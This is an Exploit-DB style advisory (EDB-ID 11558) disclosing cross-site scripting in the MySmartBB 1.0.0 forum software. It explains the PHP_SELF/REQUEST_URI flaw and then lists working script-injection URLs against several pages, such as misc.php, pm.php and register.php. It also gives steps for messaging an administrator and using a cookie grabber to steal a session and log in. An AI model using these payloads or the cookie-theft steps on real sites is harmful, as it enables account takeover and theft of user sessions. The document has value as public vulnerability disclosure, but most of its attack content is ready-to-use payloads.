MySmartBB 1.0.0 - Cross-Site Scripting

EDB-ID:

11558

CVE:

N/A


Platform:

PHP

Published:

2010-02-24

========================================================================================                  
| # Title    : MySmartBB 1.0.0 Cross Site Scripting in URI Vulnerability      
| # Author   : indoushka                                                               
| # email    : indoushka@hotmail.com                                                   
| # Home     : www.iq-ty.com                                                                     
| # Web Site : http://www.mysmartbb.com/                                                     
| # Dork     : åÐÇ ÇáãæÞÚ íÚãá Úáì ãäÊÏì MySmartBB 1.0.0                                                                                                              
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       
| # Bug      : XSS                                                                     
======================      Exploit By indoushka       =================================
 # Exploit  : 
 
Cross Site Scripting in URI
 
Vulnerability description

This script is possibly vulnerable to Cross Site Scripting (XSS) attacks.

Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser. 

This XSS variant usually appears when a PHP script is using one of following variables without filtering them: 

PHP_SELF 
REQUEST_URI 
SCRIPT_URL 
SCRIPT_URI 

Those variables are set either by Apache or the PHP engine. Apache is automatically ignoring anything in the URI after the .php extension for mapping script filename, but these variables are containing the full URI.
This vulnerability affects /MySBB/misc.php. 
The impact of this vulnerability
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user. 

Attack details

1- http://127.0.0.1/MySBB/register.php?index=1

2- http://127.0.0.1/MySBB/usercp.php?cp=1&sig=1&main=1 (test isi it infected by XSS use this cod: <ScRiPt>alert(213771818860)</ScRiPt> in the box)

3- http://127.0.0.1/MySBB/misc.php?profile=1&id=2 (to confirm is it infected)

4- send a msg to admin and use cookie graber 2 get the pass to login

http://127.0.0.1/MySBB/misc.php/>'><ScRiPt>alert(469588561854)</ScRiPt> 

http://127.0.0.1/MySBB/index.php/>'><ScRiPt>alert(213771818860)</ScRiPt>

http://127.0.0.1/memberlist.php/>'><ScRiPt>alert(213771818860)</ScRiPt>

http://127.0.0.1/MySBB/new.php/>'><ScRiPt>alert(213771818860)</ScRiPt>

http://127.0.0.1/MySBB/pm.php/>'><ScRiPt>alert(213771818860)</ScRiPt>

http://127.0.0.1/MySBB/register.php/>'><ScRiPt>alert(213771818860)</ScRiPt>

http://127.0.0.1/MySBB/search.php/>'><ScRiPt>alert(213771818860)</ScRiPt>

How to fix this vulnerability

Your script should filter metacharacters from user input.

Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX ==========================================
Greetz : 
Exploit-db Team : 
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (Tinjah.com) * Yashar (sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
www.owned-m.com * Stake (v4-team.com) * www.securitywall.org * r1z (www.sec-r1z.com) * www.kadmiwe.net
www.securityreason.com * www.packetstormsecurity.org * www.m-y.cc * Cyb3r IntRue (avengers team)
www.hacker.ps * no-exploit.com * www.bawassil.com * www.xp10.me * www.mormoroth.net * www.alkrsan.net 
--------------------------------------------------------------------------------------------------------------